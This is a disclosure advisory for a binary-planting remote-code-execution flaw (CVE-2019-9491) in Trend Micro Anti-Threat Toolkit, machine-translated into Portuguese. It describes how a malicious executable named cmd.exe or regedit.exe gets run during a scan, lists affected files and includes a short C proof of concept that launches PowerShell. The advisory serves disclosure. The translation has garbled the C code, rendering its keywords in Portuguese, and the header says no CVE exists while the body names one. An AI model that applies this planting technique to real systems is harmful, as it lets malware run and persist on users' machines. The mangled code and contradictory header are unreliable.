Trend Micro Anti-Threat Toolkit 1.62.0.1218 – Remote Code Execution
# Exploit Title: Kit de ferramentas anti-ameaças da Trend Micro 1.62.0.1218 – Execução remota de código
# Data: 2019-10-19
# Exploit Autor: hyp3rlinx
# Página inicial do fornecedor: www.trendmicro.com
# Versão: 1.62.0.1218 e abaixo
# Testado em: Microsoft Windows
# CVE: N / D
[+] Créditos: John Page (aka hyp3rlinx)
[+] Site: hyp3rlinx.altervista.org
[+] Fonte: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Segurança de Aparições
[Fornecedor]
www.trendmicro.com
[Produtos]
Kit de Ferramentas Anti-Ameaças da Trend Micro (ATTK)
1.62.0.1218 e abaixo
O ATTK (Trend Micro Anti-Threat Toolkit) pode analisar problemas de malware e limpar infecções.
Ele pode ser usado para executar análises forenses do sistema e limpar os seguintes tipos de infecção:
Infecção geral por malware
Registro mestre de inicialização Infecção
Infecção por CIDOX / RODNIX
Infecção por Rootkit
Infecção por Zbot
Infecção por Cryptolocker
etc ..
[Tipo de vulnerabilidade]
Execução remota de código
[Referência CVE]
CVE-2019-9491
[Problema de segurança]
O ATTK (Trend Micro Anti-Threat Toolkit) carregará e executará arquivos .EXE arbitrários se um autor de malware
passa a usar a convenção de nomenclatura vulnerável de “cmd.exe” ou “regedit.exe” e o malware pode ser
colocado na proximidade do ATTK quando uma varredura é iniciada pelo usuário final.
Como o ATTK é assinado por um editor verificado e, portanto, assumiu a confiança de quaisquer avisos de segurança do MOTW
são ignorados se o malware foi baixado da Internet, também pode se tornar um mecanismo de persistência,
toda vez que o Anti-Threat Toolkit é executado, o malware pode atacar.
Componentes afetados independentes do ATTK e outras integrações (por exemplo, WCRY Patch Tool, OfficeScan Toolbox, etc.)
attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1
TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f
attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed
[Referências]
https://success.trendmicro.com/solution/000149878
* Todas as versões do ATTK foram atualizadas com a versão mais recente. Kit de Ferramentas Anti-Ameaças (ATTK) 1.62.0.1223
[Exploração / POC]
Compile um .EXE usando o código “C” abaixo e use a convenção de nomenclatura “cmd.exe” ou “regedit.exe”.
Execute o Anti-Threat Toolkit e assista ao console ATTK para ver o arquivo de Trojan ser carregado e executado.
#include <windows.h>
vazio principal (vazio) {
puts (“Trend Micro Anti-Threat Toolkit PWNED!”);
puts (“Descoberta: hyp3rlinx”);
puts (“CVE-2019-9491 \ n”);
WinExec (“PowerShell”, 0);
}
[URL do vídeo POC]
[Acesso à rede]
Controlo remoto
[Gravidade]
Alto
[Cronograma da divulgação]
Notificação do fornecedor: 9 de setembro de 2019
Fornecedor confirma vulnerabilidade: 25 de setembro de 2019
Solicitações do fornecedor para coordenar o comunicado: 25 de setembro de 2019
19 de outubro de 2019: Divulgação pública
[+] Isenção de responsabilidade
As informações contidas neste comunicado são fornecidas “no estado em que se encontram”, sem garantias ou garantias de adequação ao uso ou não.
É concedida permissão para a redistribuição deste comunicado, desde que ele não seja alterado, exceto pela reformatação, e
esse crédito é dado. É dada permissão explícita para inserção em bancos de dados de vulnerabilidades e similares, desde que os devidos créditos
é dado ao autor. O autor não é responsável por qualquer uso indevido das informações aqui contidas e não aceita nenhuma responsabilidade
por qualquer dano causado pelo uso ou uso indevido dessas informações. O autor proíbe qualquer uso malicioso de informações relacionadas à segurança
ou explorações pelo autor ou em outro lugar. Todo o conteúdo (c).
hyp3rlinx
